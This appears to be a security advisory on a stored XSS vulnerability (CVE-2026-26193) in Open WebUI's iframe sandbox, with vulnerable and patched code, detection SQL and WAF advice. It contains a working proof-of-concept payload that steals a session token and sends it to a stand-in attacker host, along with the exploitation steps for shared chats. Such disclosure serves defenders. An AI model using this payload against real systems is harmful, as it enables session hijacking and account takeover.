Jul 7, 2026·7 min read·1 visit
Stored XSS via insecure iframe sandbox configurations in Open WebUI allows low-privileged users to steal admin session tokens through shared chats.
CVE-2026-26193 is a stored Cross-Site Scripting (XSS) vulnerability in Open WebUI prior to version 0.6.44. The vulnerability arises because the rendering engine hardcodes insecure sandbox options on an iframe component used for response embeds, allowing attackers to execute JavaScript in the parent window origin.
Open WebUI relies on a modular architecture to render chat content, user instructions, and dynamic embeds within the frontend layout. The Svelte-based frontend utilizes a component named ResponseMessage.svelte to present assistant responses to the client. This component processes standard markdown, LaTeX, charts, and media resources. Among these capabilities is an iframe-based embedding feature designed to display rich external integrations.
To facilitate the rendering of these external resources, the system employs a custom component known as FullHeightIframe. Because Open WebUI is built as a self-hosted platform running in local or enterprise networks, security boundaries inside the UI are critical to prevent unauthorized administrative actions. Response message embeds represent a highly exposed attack surface because they deal with arbitrary, dynamic resource URLs.
The vulnerability, classified as CWE-79 (Stored Cross-Site Scripting), resides in the rendering block for these message embeds. When a message contains an embeds array, the application dynamically instantiates an iframe for each specified link. Due to insecure default configurations within the component lifecycle, malicious code can escape the boundaries typically imposed on frame resources, leading to execution in the security origin of the hosting application.
The root cause of CVE-2026-26193 is a classic security configuration failure within the iframe's sandbox attributes. Svelte templates compile declarative attributes directly into HTML DOM properties. In ResponseMessage.svelte, the FullHeightIframe tag explicitly enables both script execution and same-origin access simultaneously. This pattern nullifies the browser security mechanisms designed to segregate third-party content.
According to the HTML5 specification, the sandbox attribute restricts the capabilities of nested frame elements. When the allow-scripts flag is specified, the frame is permitted to run scripting engines. When the allow-same-origin flag is specified, the frame treats its source content as if it originates from the parent page's domain. When these two attributes are combined, the frame is granted the capability to bypass its own sandbox constraints, programmatically accessing the parent DOM.
Furthermore, Open WebUI exposes a global configuration setting titled 'iframe Sandbox Allow Same Origin' intended to let administrators toggle this access model globally. However, the hardcoded attributes in the rendering loop for response embeds ignore this global variable. Svelte compiles the hardcoded properties allowScripts={true} and allowSameOrigin={true} directly, meaning the global security setting has no effect on this specific code path.
The vulnerable code path is found in src/lib/components/chat/Messages/ResponseMessage.svelte between lines 689 and 703. The template loop handles message.embeds without performing validation or sanitization against the provided URLs. This allows arbitrary URI schemes, including data:text/html, to be bound directly to the frame's source parameter.
<!-- Vulnerable Code Path -->
{#if message?.embeds && message.embeds.length > 0}
<div class="my-1 w-full flex overflow-x-auto gap-2 flex-wrap">
{#each message.embeds as embed, idx}
<div class="my-2 w-full" id={`${message.id}-embeds-${idx}`}>
<FullHeightIframe
src={embed}
allowScripts={true}
allowForms={true}
allowSameOrigin={true}
allowPopups={true}
/>
</div>
{/each}
</div>
{/if}To correct this vulnerability, the component was refactored in version 0.6.44 to omit the hardcoded same-origin value. The patch dynamically binds the same-origin permission to the configuration state of the application. If the configuration restricts same-origin access for standard embeds, the component honors this decision, isolating the executed scripts.
<!-- Patched Code Path -->
{#if message?.embeds && message.embeds.length > 0}
<div class="my-1 w-full flex overflow-x-auto gap-2 flex-wrap">
{#each message.embeds as embed, idx}
<div class="my-2 w-full" id={`${message.id}-embeds-${idx}`}>
<FullHeightIframe
src={embed}
allowScripts={true}
allowForms={true}
allowSameOrigin={IFRAME_SANDBOX_ALLOW_SAME_ORIGIN}
allowPopups={true}
/>
</div>
{/each}
</div>
{/if}Exploitation requires network access to the Open WebUI instance and an active user account. Because the vulnerability is stored within the chat history, the attacker first submits a standard chat interaction. The attacker then intercepts the communication flow or directly invokes the REST API endpoint to update the chat message history, introducing a custom embeds array containing a malicious data: URI.
{
"id": "target-message",
"role": "assistant",
"content": "Rendering dynamic content...",
"embeds": [
"data:text/html,<script>const token = window.parent.localStorage.getItem('token'); fetch('https://attacker.com/log?t=' + encodeURIComponent(token));</script>"
]
}Once the payload is written to the platform's backend database, the attacker executes a share operation. This step generates a unique public URL linked to the contaminated session state. The attacker then targets other local users or platform administrators by transmitting the shared URL via internal communication channels, support tickets, or direct messaging.
When the recipient accesses the shared link, the frontend attempts to render the embedded resource within the DOM. The browser resolves the data: URI and assigns it same-origin permissions due to the static sandbox configurations. The Javascript payload runs immediately, extracts the victim's JWT token from local storage, and exfiltrates it to the attacker's server, enabling instantaneous session hijacking.
The severity of CVE-2026-26193 is high, reflecting its potential to cause full account takeovers. Because the target application, Open WebUI, is often deployed within internal enterprise environments or locally on development systems, compromising an administrative session can expose sensitive corporate artificial intelligence assets, backend API keys, and model parameter files.
The CVSS v3.1 base score is 7.3. The attack complexity is low because standard browser behaviors automatically resolve the payload without requiring specialized execution engines. Because authentication to an instance is typically required to modify chat schemas, the baseline privilege is low, but the vector is highly effective because it crosses trust boundaries when an administrator views a user-shared chat.
From an operational standpoint, the script execution executes inside the context of the parent origin. This permits full access to the browser's Document Object Model (DOM), indexedDB databases, local storage repositories, and active cookies. If the victim possesses administrative privileges, the attacker gains the capability to modify global system variables, provision new administrative credentials, or access system integrations.
The recommended remediation path is to immediately upgrade Open WebUI to version 0.6.44 or later. This release correctly links the sandbox origin permissions to the global platform settings and restricts unsafe scripts by default. Administrators must verify that the environment has successfully applied the update to prevent exploitation of the existing vulnerable components.
In scenarios where immediate platform updates are not feasible, defenders should implement database-level auditing. Running SQL commands against the backend storage can identify active payloads stored within user histories. The query should look specifically for occurrences of script syntax and data: URIs inside the serialized JSON arrays of the chats table.
-- Query to identify suspect stored chats
SELECT id, user_id, title
FROM chats
WHERE chat_code LIKE '%"embeds"%'
AND (chat_code LIKE '%data:text/html%' OR chat_code LIKE '%javascript:%');Additionally, deploying Web Application Firewall (WAF) rules provides an immediate layer of active defense. WAF policies should inspect incoming POST or PATCH requests targeting /api/v1/chats or adjacent endpoints. Rules must flag and block request bodies that combine the embeds keyword with data: URI structures, preventing the registration of malicious configurations in the backend.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
open_webui Open WebUI | < 0.6.44 | 0.6.44 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-79 |
| Attack Vector | Network |
| CVSS v3.1 Score | 7.3 |
| EPSS Score | 0.00198 |
| Exploit Status | poc |
| KEV Status | Not Listed |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Open WebUI versions prior to 0.6.6 contain a stored cross-site scripting (XSS) vulnerability that allows low-privileged users to upload malicious HTML files containing arbitrary JavaScript. When viewed by an administrator, the executed script can abuse administrative APIs to register malicious functions, leading to remote code execution on the underlying server host.
A critical Stored Cross-Site Scripting (XSS) vulnerability exists in Open WebUI versions prior to 0.6.6. The vulnerability resides in client-side Markdown rendering, where unvalidated iframe tags containing local API base URLs bypass DOMPurify sanitization. This flaw allows authenticated attackers to steal user session tokens. If an administrative session is compromised, the attacker can leverage the application's native Python execution capabilities ('Functions') to achieve arbitrary Remote Code Execution (RCE) on the hosting server.
CVE-2026-26192 is a high-severity Stored Cross-Site Scripting (XSS) vulnerability in Open WebUI prior to version 0.7.0. Authenticated users can modify chat history metadata to force document citations to render inside an HTML iframe configured with an insecure sandbox policy. By combining 'allow-scripts' and 'allow-same-origin', the sandbox boundary is neutralized. This allows scripts executing within the iframe to access the parent window's DOM, extract sensitive Web UI local storage keys (such as authentication JWTs), and perform state-changing actions on behalf of other users, including administrators.
Open WebUI versions 0.7.2 and below contain a blind Server-Side Request Forgery (SSRF) vulnerability. The flaw exists within the image editing router, specifically inside the /api/v1/images/edit endpoint. An authenticated attacker with low privileges can exploit this endpoint to initiate asynchronous HTTP GET requests to local, private, or internal network services, mapping system resources and bypassing boundary restrictions.
An access control deficiency in the 9Router dashboard allows unauthenticated remote attackers to perform full CRUD operations on integrated AI providers, extract plaintext API keys, and access complete system conversation histories.
A DOM-based cross-site scripting (XSS) vulnerability exists in Craft CMS versions 4.0.0-RC1 through 4.17.15 and 5.0.0-RC1 through 5.9.22. The flaw resides within the CraftSupport widget's feedback search component, which fails to neutralize GitHub issue titles before rendering them into the administrator's control panel. An unauthenticated attacker can exploit this vulnerability by submitting a crafted issue to the public Craft CMS repository on GitHub.